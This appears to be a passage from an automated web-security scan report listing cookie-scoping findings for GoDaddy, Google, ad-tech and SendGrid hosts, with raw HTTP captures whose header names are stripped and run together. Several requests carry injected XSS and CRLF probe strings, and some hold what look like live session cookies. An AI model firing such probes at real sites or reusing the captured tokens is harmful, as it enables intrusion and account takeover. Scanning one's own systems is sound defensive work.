HTTP/1.1 200 OK.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"Set-Cookie: uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%DYS3+0s]#%2L_'x%SEV/i#+R<4FSn39!r-OkI+zwP7ooYCfd'MJW`c83dBY1)n(>M[<%V[aJ87vV/B@4NYs.YMlDRVIc)_H8y.$NwqVq!7%!wRG/GEp+_VEw/H0cbO+^m4wywmqvD5HylZt-`lsg>'U7h_pKrAi%rT.y?o9'UK6C(jUw_Z.6IFBGy$PK`lu0M6]2s<KIl%_rd%1[EkoV60CGW9)8=tOO<*)xPd`pOWAH^1JiBtesaB:bjz!Z4@A.V9>Z4/>Rhdwnc4Lu9v4EGutB^9(LJwLYo>*<4V?[?QarR!yd6x$3p6s4y9=*jX/T*jr`Mw6TFZ%zE6'f1ZdRRP4T1G*Xlas6zLgu4JM*^DFF/MBCoQ+#s!y^GpU7Wbjxj$[4zrjDdg%=b8H(2MYRYrYXj_?mUnGjoPmm><'LM?#]ki5O*BR; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly ..,........@..L..;
10.12. http://ib.adnxs.com/seg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ib.adnxs.com
Path:
/seg
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 15:36:35 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%DYS3+0s]#%2L_'x%SEV/i#+R<4FSn39!r-OkI+zwP7ooYCfd'MJW`c83dBY1J^1-5Cntr395?t(4KFjNtVo6NbIG)y#5Z34o7G%v^Fw$`AOx*J(**-7Nh+W.(JV+:gkMW-QRHM#D3I)HhnI(LJ!-aw'VUgsN[as8T8hX74K]7EtSI=V($/vI+)i(IK!IzA[?am$Mm1[N#9If)DYy?#8f_5uOttjiYIEScq5a)DL9DaLSMw=S?7p:`Sg#Ej8+8noJ+!+(MDu6m4D/#3CRI'!wbHH0%[0i9[?:Wm*eA@IwgvbJnJeOU3uQB-3v.Mwum1V9*yfF*S%ZA(+do)@j3-TInN^oRrI^uHcPO*@bsg]<+#s!y^GpU7Wbjxj$[4zrjDdg%=b8H)2MYRYrYXj_?mUnGjoPmm><'LM?#]mL=U0]-; path=/; expires=Thu, 15-Dec-2011 15:36:35 GMT; domain=.adnxs.com; HttpOnly
Request
GET /seg?add=151451&t=2 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69; anj=Kfu=8fG7DHDYS3+0s]#%2L_'x%SEV/i#-+L4FSn39!r-OV)`C#]Qc+VIT6KwGp6$y9YIv(82eK6D:VuSY[$CSbVHSfCfd'MJW`c83dBZErsDE'Cnqie#C!Ez+6BEs89V9=a^#L6XZ@Sew8v^HviOH?4p'#ux43V(O/$slwwE(^*x)Nl'L:@DeNg8aZ%QD7(p=-R$:ZlH3fM>3p=2mK+b3Mq.ged_41M#m8q]pSjconyL`z$71/WNM/ADGs9KQYy:^bLUM_4N5#5NG6Nh'EoM_B46MJd1d$'m:k-2=6lZz?W7sBv22A.Cl*NL`LS#AoL6#]E]Ii!v(X.tK$#0EM`+8AU?g$qlyh)-F4QwDy9xJxEA@Q(Q't4on3w7fu)8S.LJJC6d)*-99#''vuK8j>0in06hw7KrG(->%q@nP^qkO$d0sG)BuGhOV)rR4/6dPj]vQu$99SnItM)!; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..
Response
HTTP/1.1 302 Found.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"Set-Cookie: uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 15:36:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%DYS3+0s]#%2L_'x%SEV/i#+R<4FSn39!r-OkI+zwP7ooYCfd'MJW`c83dBY1J^1-5Cntr395?t(4KFjNtVo6NbIG)y#5Z34o7G%v^Fw$`AOx*J(**-7Nh+W.(JV+:gkMW-QRHM#D3I)HhnI(LJ!-aw'VUgsN[as8T8hX74K]7EtSI=V($/vI+)i(IK!IzA[?am$Mm1[N#9If)DYy?#8f_5uOttjiYIEScq5a)DL9DaLSMw=S?7p:`Sg#Ej8+8noJ+!+(MDu6m4D/#3CRI'!wbHH0%[0i9[?:Wm*eA@IwgvbJnJeOU3uQB-3v.Mwum1V9*yfF*S%ZA(+do)@j3-TInN^oRrI^uHcPO*@bsg]<+#s!y^GpU7Wbjxj$[4zrjDdg%=b8H)2MYRYrYXj_?mUnGjoPmm><'LM?#]mL=U0]-; path=/; expires=Thu, 15-Dec-2011 15:36:35 GMT; domain=.adnxs.com; HttpOnly .com:81/CACMSH.ashx?&t=1
10.13. http://id.google.com/verify/EAAAAM3m5M-5VWJq99izgRISSwA.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://id.google.com
Path:
/verify/EAAAAM3m5M-5VWJq99izgRISSwA.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; expires=Sat, 17-Mar-2012 16:13:20 GMT; path=/; domain=.google.com; HttpOnly
Request
GET /verify/EAAAAM3m5M-5VWJq99izgRISSwA.gif HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server;q=0.3keLRTd6jL3qAqoPnuMctz75b7_TrMQ=YoO7IMhzJsvpUm7U; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=OfIpxrXVO5NSaLscWANYTdJ6wK00cMsAk4v9TJrRXGHdy1F4BPsM-1wczJOe1wJItW5A5zxEQcMb9fALGgEiafj_Zx-hNW74w3p8LNx501XJMZ_JLwMORpu5plDcGMX3
Response
HTTP/1.1 200 OKSet-Cookie: NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; expires=Sat, 17-Mar-2012 16:13:20 GMT; path=/; domain=.google.com; HttpOnly ..,...........D..;
10.14. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.15. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.16. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
10.17. http://img.godaddy.com/image.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://img.godaddy.com
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:isc=d0d8de1c8075e63937e1be01; domain=.godaddy.com; path=/ visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:39 GMT; path=/
Request
GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB181&privatelabelid=1&status=200&rand=0.479543640035923&page=%2fproductadvisor%2fpastart.aspx&referrer=http%3a%2f%2fwww.godaddy.com%2fgdshop%2fsite_search.asp%3fci%3d9104%26pageNum%3d1%26searchFor%3dxss&ci=13108&split=19&querystring=ci%3d13108 HTTP/1.1/*;q=0.5;q=0.7/productadvisor/pastart.aspx?ci=13108&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/16/2011 18:07:29&pathway=2a590ae0-0ee8-47bd-8061-af016da64611&V_DATE=09/16/2011 11:07:19; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A
Response
HTTP/1.1 200 OK/2011 18:07:39&pathway=2a590ae0-0ee8-47bd-8061-af016da64611&V_DATE=09/16/2011 11:07:19; path=/Set-Cookie: isc=d0d8de1c8075e63937e1be01; domain=.godaddy.com; path=/ Set-Cookie: visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:39 GMT; path=/ ..,...........D..;
10.18. http://img.godaddy.com/image.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://img.godaddy.com
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:actioncount=d0d8de1c964083c62476d317; domain=.godaddy.com; path=/ app_pathway=d0d8de1c713e614c609a8053; domain=.godaddy.com; path=/ visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:20 GMT; path=/
Request
GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB181&privatelabelid=1&status=200&rand=0.189218924934612&page=%2fdefault.aspx&split=19 HTTP/1.1/*;q=0.5;q=0.7&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=19
Response
HTTP/1.1 200 OKSet-Cookie: actioncount=d0d8de1c964083c62476d317; domain=.godaddy.com; path=/ e1c3e2452299539dc20; path=/Set-Cookie: app_pathway=d0d8de1c713e614c609a8053; domain=.godaddy.com; path=/ 73e3dfc7228ecbe&S_TOUCH=09/16/2011 18:07:20&pathway=c300561b-e09a-4c96-8e0e-ac74afbb6017; path=/Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:20 GMT; path=/ ..,...........D..;
10.19. http://img.godaddy.com/pageevents.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://img.godaddy.com
Path:
/pageevents.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:isc=eebc2%0d%0a0acfdd19135; domain=.godaddy.com; path=/ visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:08:29 GMT; path=/
Request
GET /pageevents.aspx?page_name=/domains/search.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.45087383035570383&comview=0 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/16/2011 18:06:35&pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5&V_DATE=09/16/2011 11:05:34; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OK/2011 18:06:35&pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5&V_DATE=09/16/2011 11:05:34; path=/Set-Cookie: isc=eebc2%0d%0a0acfdd19135; domain=.godaddy.com; path=/ Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:08:29 GMT; path=/ ..,...........D..;
10.20. http://img.secureserver.net/image.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://img.secureserver.net
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; path=/ visitor=vid=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; expires=Sat, 15-Sep-2012 18:09:35 GMT; path=/
Request
GET /image.aspx?page=%2Farticle%2F5246&site=help.securepaynet.net&server=m1plgdhelp003&querystring=plid%3D&status=200&article_id=5246&locale=en&topic_id=168 HTTP/1.1.net/topic/168/article/5246?plid=;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; path=/ /2011 18:09:35&pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b&V_DATE=09/16/2011 11:09:35; path=/Set-Cookie: visitor=vid=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; expires=Sat, 15-Sep-2012 18:09:35 GMT; path=/ ..,...........D..;
10.21. http://landing.sendgrid.com/smtp-with-bullet-points/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://landing.sendgrid.com
Path:
/smtp-with-bullet-points/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:__pcid=9GFPhk:1; Domain=.sendgrid.com; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/
Request
GET /smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK6ecdddc8dd049573f00e4"Set-Cookie: __pcid=9GFPhk:1; Domain=.sendgrid.com; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/ .performable.us.performable.com/catalog/2537.0/assets/images/HpeUB-sendgrid_logo.jpg" height="359" width="93" />...[SNIP]...
10.22. http://load.exelator.com/load/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://load.exelator.com
Path:
/load/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TFF=eJyVkjsOgzAMQO%252FCCWzziTELx%252BjKwFCpW7sh7t6EBhecUKVDFCt6L7ZlT0Ioy1OQpEJoRkIY%252B76napiEZLkLDv44An%252FBHq4Jj4GvDU%252FxHD2nWpnhb2guyFpJ7OLf821%252BTK%252F56m9raBdttmsP%252FeRt1xsf8mBaWdRKjZCJvAI1ZSrrHO98CFO%252BPef58Kc80XOqlRn%252Bzcyj42RytqYWcz2w7lQIU972oHnQeE61UmOfI2Tnnq%252FswBfncar9WxlxdiPBfXnO8HYjN%252F48G%252BbjRrLdyAtjfQNukQxI; expires=Sat, 14-Jan-2012 16:32:42 GMT; path=/; domain=.exelator.com
Request
GET /load/?p=104&g=210&j=0 HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SgjAQhN8lT3CXQAJJ408jM4oFGQdpHEpqS%252BXdJYLJwRhnpL1vb%252B92W42oH3eNoJlFSMpNnuecmU6jVJkZgNDsdC7t4Xi9XYqqsMy0A%252Fu5k05zakO14gtogolCGUwaMpppBQWDuOKQFOX%252BCehoOp7IYFoLlALuwXJHebIwcvdrEvgNpl%252FrmFZQgCPY7qiLq0J%252BAJnN1cKTfk2la%252FuL1xRt5K%252F4ClQkqiP9C51noMc%253D; TFF=eJyVkzsOgzAMhu%252FCCWzzcGIWjtGVgaFSt3ZD3L3hlYIJlTOgBPR9sa0%252F9EIo41uQpECoOkLovPdUtL2QjE%252FBNjwNu7DAvp0uPM58qXhq19ejx1GzGWGF6kQyNpqcP61nD4%252Fh1X%252BGwmjEKerU1Kv3h0drHY5aTmcUFCjJnMeBrzPy2DRrHqTyaBxsJN31VGNqhsWDfXvl9QyxDiqPo2Y19hwhmXu6swNvrsNRy%252B2MXPJGAv94l%252BD1jVz4czbu9B86fSNvjOkLi%252BQMlA%253D%253D; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D
Response
HTTP/1.1 302 FoundSet-Cookie: TFF=eJyVkjsOgzAMQO%252FCCWzziTELx%252BjKwFCpW7sh7t6EBhecUKVDFCt6L7ZlT0Ioy1OQpEJoRkIY%252B76napiEZLkLDv44An%252FBHq4Jj4GvDU%252FxHD2nWpnhb2guyFpJ7OLf821%252BTK%252F56m9raBdttmsP%252FeRt1xsf8mBaWdRKjZCJvAI1ZSrrHO98CFO%252BPef58Kc80XOqlRn%252Bzcyj42RytqYWcz2w7lQIU972oHnQeE61UmOfI2Tnnq%252FswBfncar9WxlxdiPBfXnO8HYjN%252F48G%252BbjRrLdyAtjfQNukQxI; expires=Sat, 14-Jan-2012 16:32:42 GMT; path=/; domain=.exelator.com .net/datapair?net=ex&segs=
10.23. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKSet-Cookie: ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.24. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.25. http://p.brilig.com/contact/bct
previous
next
Summary
Severity:
Information
Confidence:
Certain
